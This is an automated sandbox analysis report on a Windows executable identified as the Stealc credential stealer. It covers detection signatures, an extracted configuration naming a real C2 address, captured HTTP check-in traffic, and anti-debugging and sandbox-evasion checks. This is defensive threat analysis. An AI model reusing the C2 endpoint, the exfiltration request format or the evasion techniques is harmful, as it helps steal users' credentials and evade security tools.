Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1533036
MD5:e12ed88e4c214b23dfbd11ea91d2ece8
SHA1:2a76376af58e1a12f2947de272a3e6ebb8174fe4
SHA256:6ab0865ecbaf0e450e68a7d866f036113b50ae6edff09b1f0e41c2514cf72233
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6444 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E12ED88E4C214B23DFBD11EA91D2ECE8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2182541833.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6444JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6444JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.540000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-14T11:03:08.697679+020020442431Malware Command and Control Activity Detected192.168.2.649711185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.540000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 44%
                Source: file.exeVirustotal: Detection: 51%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0054C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00547240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00547240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00549AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00549B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00558EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00558EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00554910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0054DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0054E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00554570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0054ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0054BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00553EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 42 38 34 38 42 41 31 38 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"F0B848BA18AD2322695909------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"doma------ECGIIIDAKJDHJKFHIEBF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00544880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00544880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 42 38 34 38 42 41 31 38 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"F0B848BA18AD2322695909------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"doma------ECGIIIDAKJDHJKFHIEBF--
                Source: file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2223874889.0000000001294000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn9fv&
                Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phptop
                Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz9jv%
                Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37e

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081A01F0_2_0081A01F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BE9D80_2_007BE9D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091192A0_2_0091192A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D6A6C0_2_007D6A6C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00916A850_2_00916A85
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A7ADC0_2_008A7ADC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090AA560_2_0090AA56
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081CA650_2_0081CA65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009073B40_2_009073B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091332F0_2_0091332F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090ECD60_2_0090ECD6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00905CF00_2_00905CF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914CFF0_2_00914CFF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009094550_2_00909455
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2C5AE0_2_00A2C5AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008115F40_2_008115F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00984D410_2_00984D41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090FE5F0_2_0090FE5F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E8E4B0_2_009E8E4B
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 005445C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: qydepkqh ZLIB complexity 0.9947846029234478
                Source: file.exe, 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2182541833.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00559600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00553720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00553720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\A2EDFAKR.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 44%
                Source: file.exeVirustotal: Detection: 51%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1854976 > 1048576
                Source: file.exeStatic PE information: Raw size of qydepkqh is bigger than: 0x100000 < 0x19ec00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qydepkqh:EW;zugntyrx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qydepkqh:EW;zugntyrx:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00559860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cb16f should be: 0x1d0d3d
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: qydepkqh
                Source: file.exeStatic PE information: section name: zugntyrx
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AC8DA push ebx; mov dword ptr [esp], edi0_2_009AC91C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055B035 push ecx; ret 0_2_0055B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B88F6 push edx; mov dword ptr [esp], ecx0_2_009B894A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DD0F0 push 365ABF76h; mov dword ptr [esp], ebp0_2_009DD118
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097A0E4 push edx; mov dword ptr [esp], esi0_2_0097A0E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085800F push edx; mov dword ptr [esp], ebp0_2_00858038
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DA810 push ecx; mov dword ptr [esp], 19CBE1CBh0_2_009DAB85
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081A01F push edx; mov dword ptr [esp], edi0_2_0081A158
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081A01F push 03655A98h; mov dword ptr [esp], edx0_2_0081A1A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081A01F push eax; mov dword ptr [esp], ebx0_2_0081A1E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C405D push 57C43AEFh; mov dword ptr [esp], esp0_2_009C40A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00937047 push ebx; mov dword ptr [esp], ebp0_2_00937097
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00937047 push ebp; mov dword ptr [esp], ecx0_2_009370EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2D042 push 62CD203Ah; mov dword ptr [esp], eax0_2_00A2D07D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2D042 push esi; mov dword ptr [esp], ebp0_2_00A2D0FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B5076 push 6CD8DAC4h; mov dword ptr [esp], edi0_2_009B50E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F064 push ebx; mov dword ptr [esp], 38F61875h0_2_0093F093
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F064 push edi; mov dword ptr [esp], ebx0_2_0093F0C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F064 push edx; mov dword ptr [esp], esi0_2_0093F0D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F064 push 3A89FF30h; mov dword ptr [esp], ecx0_2_0093F148
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00984066 push 0A4CE101h; mov dword ptr [esp], ebp0_2_009840AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE01B5 push 34960141h; mov dword ptr [esp], esi0_2_00BE01CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE01B5 push 52E0838Ah; mov dword ptr [esp], eax0_2_00BE0297
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2C1B7 push 3C87B317h; mov dword ptr [esp], esi0_2_00A2C26B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CA18B push 0BD5C9A0h; mov dword ptr [esp], eax0_2_009CA1A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DB980 push 7C99EA9Bh; mov dword ptr [esp], edi0_2_009DB9DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009421AC push edx; mov dword ptr [esp], esi0_2_009421C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C51C5 push ecx; mov dword ptr [esp], esi0_2_009C5207
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD9FF push ecx; mov dword ptr [esp], esi0_2_009CDA10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD9FF push esi; mov dword ptr [esp], edx0_2_009CDA15
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD9FF push eax; mov dword ptr [esp], 7E77EDD3h0_2_009CDA26
                Source: file.exeStatic PE information: section name: qydepkqh entropy: 7.953404552841359

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00559860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13671
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C2D2 second address: 91C2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906E57 second address: 906E8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ABh 0x00000007 jnp 00007F8FB8B0B4A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jno 00007F8FB8B0B4A6h 0x00000016 jmp 00007F8FB8B0B4B5h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B83C second address: 91B869 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FB915C64Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8FB915C651h 0x00000013 jno 00007F8FB915C646h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B869 second address: 91B87C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D5F9 second address: 91D5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D5FE second address: 91D603 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
